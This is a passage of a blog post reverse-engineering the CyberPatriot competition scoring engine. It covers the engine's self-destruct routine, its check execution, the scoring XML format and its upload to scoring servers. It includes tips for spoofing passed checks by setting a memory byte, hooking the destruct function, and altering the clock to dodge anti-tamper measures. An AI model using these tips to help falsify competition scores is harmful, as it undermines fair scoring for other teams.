The factors it checks include the time, the DestructImage object of the XML Scoring Data, etc.</p><p>If the function decides to destruct the image, it is quite amusing what it does...</p><figure class="kg-card kg-image-card"><img src="https://billdemirkapi.me/content/images/2023/12/image-6.png" class="kg-image" alt="Reversing the CyberPatriot National Competition Scoring Engine" loading="lazy" width="517" height="536"></figure><p>The first if statement checks whether or not to destruct the image, and if it should destruct, it starts:</p><ul><li>Deleting registry keys and the sub keys under them such as &quot;<code>SOFTWARE\\Microsoft\\Windows NT</code>&quot;, &quot;<code>SOFTWARE\\Microsoft\\Windows</code>&quot;, &quot;<code>SOFTWARE\\Microsoft</code>&quot;, &quot;<code>SOFTWARE\\Policies</code>&quot;, etc.</li><li>Deleting files in critical system directories such as &quot;<code>C:\\Windows</code>&quot;, &quot;<code>C:\\Windows\\System32</code>&quot;, etc.</li><li>Overwriting the first 200 bytes of your first physical drive with NULL bytes.</li><li>Terminating every process running on your system.</li></ul><p>As you can see in the image, it strangely repeats these functions over and over again before exiting. I guess they&apos;re quite serious when they say don&apos;t try to run the client on your machine.</p><p>After checking whether or not to destroy the system, it checks to see if the system is shutting down. If it is not, it enters a while loop which executes the checks from the Scoring Data XML. It does this in a function I call &quot;<code>ExecuteCheck</code>&quot;.</p><p>The function &quot;<code>ExecuteCheck</code>&quot; essentially loops over every pass condition for a check and executes the check instructions (e.g. <code>C:\trojan.exe Exists Equals true</code>). I won&apos;t get into the nuances of this function, but this is an important note if you want to spoof that the check passed.
The byte at <code>check + 0x54</code> indicates whether or not the check passed. Set it to 1 and the engine will consider that check successful.</p><p>After executing every check, the engine calls a function I call &quot;<code>GenerateScoringXML</code>&quot;. This function takes the data from the checks and generates an XML file that will be sent to the scoring server. It loops over each check/penalty and reads the <code>check + 0x54</code> byte to see if it passed. This XML is also stored in encrypted data files under &quot;<code>C:\CyberPatriot\ScoringData\*.dat</code>&quot;. Here is what a scoring XML looks like (you can use my decrypt program on these data files too!):</p><pre><code class="language-xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;CyberPatriot&gt;
  &lt;ResourceID&gt;&lt;/ResourceID&gt;
  &lt;TeamID/&gt;
  &lt;Tier/&gt;
  &lt;StartTime&gt;&lt;/StartTime&gt;
  &lt;VerifiedStartTime&gt;&lt;/VerifiedStartTime&gt;
  &lt;BestStartTime&gt;&lt;/BestStartTime&gt;
  &lt;TeamStartTime/&gt;
  &lt;ClientTime&gt;&lt;/ClientTime&gt;
  &lt;ImageRunningTime&gt;&lt;/ImageRunningTime&gt;
  &lt;TeamRunningTime&gt;&lt;/TeamRunningTime&gt;
  &lt;Nonce&gt;&lt;/Nonce&gt;
  &lt;Seed&gt;&lt;/Seed&gt;
  &lt;Mac&gt;&lt;/Mac&gt;
  &lt;Cpu&gt;&lt;/Cpu&gt;
  &lt;Uptime&gt;&lt;/Uptime&gt;
  &lt;Sequence&gt;1&lt;/Sequence&gt;
  &lt;Tampered&gt;false&lt;/Tampered&gt;
  &lt;ResourcePath&gt;C:\CyberPatriot\ScoringResource.dat&lt;/ResourcePath&gt;
  &lt;ResourceHash&gt;&lt;/ResourceHash&gt;
  &lt;ClientPath&gt;C:\CyberPatriot\CCSClient.exe&lt;/ClientPath&gt;
  &lt;ClientHash&gt;&lt;/ClientHash&gt;
  &lt;InstallDate&gt;&lt;/InstallDate&gt;
  &lt;ProductID&gt;&lt;/ProductID&gt;
  &lt;DiskID&gt;&lt;/DiskID&gt;
  &lt;MachineID&gt;&lt;/MachineID&gt;
  &lt;DPID&gt;&lt;/DPID&gt;
  &lt;Check&gt;
    &lt;CheckID&gt;&lt;/CheckID&gt;
    &lt;Passed&gt;0&lt;/Passed&gt;
  &lt;/Check&gt;
  &lt;Penalty&gt;
    &lt;CheckID&gt;&lt;/CheckID&gt;
    &lt;Passed&gt;0&lt;/Passed&gt;
  &lt;/Penalty&gt;
  &lt;TotalPoints&gt;0&lt;/TotalPoints&gt;
&lt;/CyberPatriot&gt;
</code></pre><p>After generating the Scoring XML, the program calls a function I call &quot;<code>UploadScores</code>&quot;. This function first checks internet connectivity by trying to reach Google, the primary CyberPatriot scoring server, and the backup CyberPatriot scoring server. It then uploads the scoring XML to the first available scoring server using curl. This function performs integrity checks to see whether the score XML is incomplete or <strong>whether there is proxy interception</strong>.</p><p>After the scoring XML has been uploaded, the engine updates &quot;<code>ScoringReport.html</code>&quot; to reflect the current status, such as internet connectivity, the points scored, the vulnerabilities found, etc.</p><p>Finally, the function ends by updating the README shortcut on the Desktop with the appropriate link specified in the decrypted &quot;<code>ScoringResource.dat</code>&quot; XML and calling &quot;<code>DestructImage</code>&quot; again to see if the image should destruct or not. If you&apos;re worried about the image destructing, just hook it and return <code>0</code>.</p><h2 id="conclusion">Conclusion</h2><p>In conclusion, the CyberPatriot Scoring Engine is really not that complicated. I hope this article clears up some of the myths and unknowns associated with the engine and gives you a better picture of how it all works. No doubt CyberPatriot will change how they encrypt/decrypt for next year&apos;s competition, but I am not sure to what extent they will change things.</p><p>If you&apos;re wondering how I got the &quot;<code>ScoringResource.dat</code>&quot; files from older VM images, there are several methods:</p><ul><li>VMware has an option under File called &quot;Map Virtual Disks&quot;. You can give it a VMDK file and it will map it as a disk.
You can grab it from the filesystem there.</li><li>7-Zip can extract VMDK files.</li><li>If you want to run the VM, you can set your system time to the time of the competition and turn off networking for the VM. No DestructImage :)</li></ul>]]></content:encoded></item></channel></rss>